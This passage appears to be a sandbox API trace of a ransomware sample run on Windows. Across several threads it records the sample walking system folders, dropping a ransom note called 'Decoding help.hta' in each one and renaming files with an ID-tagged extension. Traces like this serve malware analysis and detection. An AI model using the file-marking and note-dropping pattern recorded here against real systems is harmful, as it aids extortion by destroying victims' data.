hFindFile=0x5e34f0, lpFindFileData=0x1315fd30 | out: lpFindFileData=0x1315fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.825] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.825] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.825] FindNextFileW (in: hFindFile=0x5e34f0, lpFindFileData=0x1315fd30 | out: lpFindFileData=0x1315fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de525d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2caa5f40, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40270, dwReserved0=0x0, dwReserved1=0x0, cFileName="cache.dat", cAlternateFileName="")) returned 1 [0048.825] lstrcpyW (in: lpString1=0x10d06a10, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*" [0048.825] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*") returned 75 [0048.825] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\Decoding help.hta" [0048.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\decoding help.hta")) returned 0xffffffff [0048.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0052.279] WriteFile (in: hFile=0x3ec, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1315fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1315fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.008] CloseHandle (hObject=0x3ec) returned 1 [0057.421] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.421] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cache.dat") returned 1 [0057.421] lstrlenW (lpString="cache.dat") returned 9 [0057.421] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*" [0057.421] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*") returned 75 [0057.421] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\", lpString2="cache.dat" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" [0057.421] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" [0057.421] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0057.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.422] FindNextFileW (in: hFindFile=0x5e34f0, lpFindFileData=0x1315fd30 | out: lpFindFileData=0x1315fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de525d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2caa5f40, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40270, dwReserved0=0x0, dwReserved1=0x0, cFileName="cache.dat", cAlternateFileName="")) returned 0 [0057.422] FindClose (in: hFindFile=0x5e34f0 | out: hFindFile=0x5e34f0) returned 1 Thread: id = 618 os_tid = 0xdec [0048.828] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*.*", lpFindFileData=0x133dfd30 | out: lpFindFileData=0x133dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e34b0 [0048.828] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.829] FindNextFileW (in: hFindFile=0x5e34b0, lpFindFileData=0x133dfd30 | out: lpFindFileData=0x133dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.829] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.829] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.829] FindNextFileW (in: hFindFile=0x5e34b0, lpFindFileData=0x133dfd30 | out: lpFindFileData=0x133dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0048.829] FindClose (in: hFindFile=0x5e34b0 | out: hFindFile=0x5e34b0) returned 1 Thread: id = 619 os_tid = 0xdf0 [0048.832] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*", lpFindFileData=0x1373fd30 | out: lpFindFileData=0x1373fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e34b0 [0048.832] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.832] FindNextFileW (in: hFindFile=0x5e34b0, lpFindFileData=0x1373fd30 | out: lpFindFileData=0x1373fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.832] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.832] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.832] FindNextFileW (in: hFindFile=0x5e34b0, lpFindFileData=0x1373fd30 | out: lpFindFileData=0x1373fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Applications", cAlternateFileName="APPLIC~1")) returned 1 [0048.832] lstrcmpW (lpString1=".", lpString2="Applications") returned -1 [0048.832] lstrcmpW (lpString1="..", lpString2="Applications") returned -1 [0048.832] lstrcmpiW (lpString1="windows", lpString2="Applications") returned 1 [0048.832] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*" [0048.832] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*") returned 48 [0048.833] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\", lpString2="Applications" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications" [0048.833] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*" [0048.833] GlobalMemoryStatus (in: lpBuffer=0x1373fd10 | out: lpBuffer=0x1373fd10) [0048.833] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4238660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a4 [0048.835] CloseHandle (hObject=0x5a4) returned 1 [0048.835] FindNextFileW (in: hFindFile=0x5e34b0, lpFindFileData=0x1373fd30 | out: lpFindFileData=0x1373fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e1ecc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0048.835] lstrcmpW (lpString1=".", lpString2="Temp") returned -1 [0048.835] lstrcmpW (lpString1="..", lpString2="Temp") returned -1 [0048.835] lstrcmpiW (lpString1="windows", lpString2="Temp") returned 1 [0048.835] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*" [0048.835] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*") returned 48 [0048.835] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\", lpString2="Temp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp" [0048.835] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*.*" [0048.835] GlobalMemoryStatus (in: lpBuffer=0x1373fd10 | out: lpBuffer=0x1373fd10) [0048.836] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x34283f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a4 [0048.840] CloseHandle (hObject=0x5a4) returned 1 [0048.840] FindNextFileW (in: hFindFile=0x5e34b0, lpFindFileData=0x1373fd30 | out: lpFindFileData=0x1373fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e1ecc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0048.840] FindClose (in: hFindFile=0x5e34b0 | out: hFindFile=0x5e34b0) returned 1 Thread: id = 620 os_tid = 0xdf4 [0048.834] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*", lpFindFileData=0x1383fd30 | out: lpFindFileData=0x1383fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfc64e30, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3430 [0048.834] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.835] FindNextFileW (in: hFindFile=0x5e3430, lpFindFileData=0x1383fd30 | out: lpFindFileData=0x1383fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfc64e30, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.835] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.835] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.835] FindNextFileW (in: hFindFile=0x5e3430, lpFindFileData=0x1383fd30 | out: lpFindFileData=0x1383fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfcb10f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 1 [0048.835] lstrcpyW (in: lpString1=0x98aa858, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*" [0048.835] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*") returned 54 [0048.835] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\Decoding help.hta" [0048.835] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\decoding help.hta")) returned 0xffffffff [0048.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0051.465] WriteFile (in: hFile=0x43c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1383fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1383fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.021] CloseHandle (hObject=0x43c) returned 1 [0055.315] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.157] lstrcmpiW (lpString1="Decoding help.hta", lpString2="RacWmiDatabase.sdf") returned -1 [0058.157] lstrlenW (lpString="RacWmiDatabase.sdf") returned 18 [0058.157] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*" [0058.157] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*") returned 54 [0058.157] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\", lpString2="RacWmiDatabase.sdf" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" [0058.157] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" [0058.157] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]" [0058.157] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.157] FindNextFileW (in: hFindFile=0x5e3430, lpFindFileData=0x1383fd30 | out: lpFindFileData=0x1383fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfcb10f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0058.157] FindClose (in: hFindFile=0x5e3430 | out: hFindFile=0x5e3430) returned 1 Thread: id = 621 os_tid = 0xdf8 [0048.840] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*", lpFindFileData=0x13a1fd30 | out: lpFindFileData=0x13a1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x26a28a10, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da8f8 [0050.359] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.359] FindNextFileW (in: hFindFile=0x5da8f8, lpFindFileData=0x13a1fd30 | out: lpFindFileData=0x13a1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x26a28a10, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.359] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.359] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.359] FindNextFileW (in: hFindFile=0x5da8f8, lpFindFileData=0x13a1fd30 | out: lpFindFileData=0x13a1fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x26a28a10, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x26a28a10, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x26a28a10, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0050.359] lstrcpyW (in: lpString1=0x25197a78, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*" [0050.360] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*") returned 50 [0050.360] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Decoding help.hta" [0050.360] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\decoding help.hta")) returned 0x2020 [0050.360] FindNextFileW (in: hFindFile=0x5da8f8, lpFindFileData=0x13a1fd30 | out: lpFindFileData=0x13a1fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb35800, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xecb35800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xbddb7d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacDatabase.sdf", cAlternateFileName="RACDAT~1.SDF")) returned 1 [0050.360] lstrcpyW (in: lpString1=0x25197a78, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*" [0050.360] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*") returned 50 [0050.360] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Decoding help.hta" [0050.360] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\decoding help.hta")) returned 0x2020 [0050.360] lstrcmpiW (lpString1="Decoding help.hta", lpString2="RacDatabase.sdf") returned -1 [0050.360] lstrlenW (lpString="RacDatabase.sdf") returned 15 [0050.360] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*" [0050.360] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*.*") returned 50 [0050.360] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\", lpString2="RacDatabase.sdf" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" [0050.360] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All 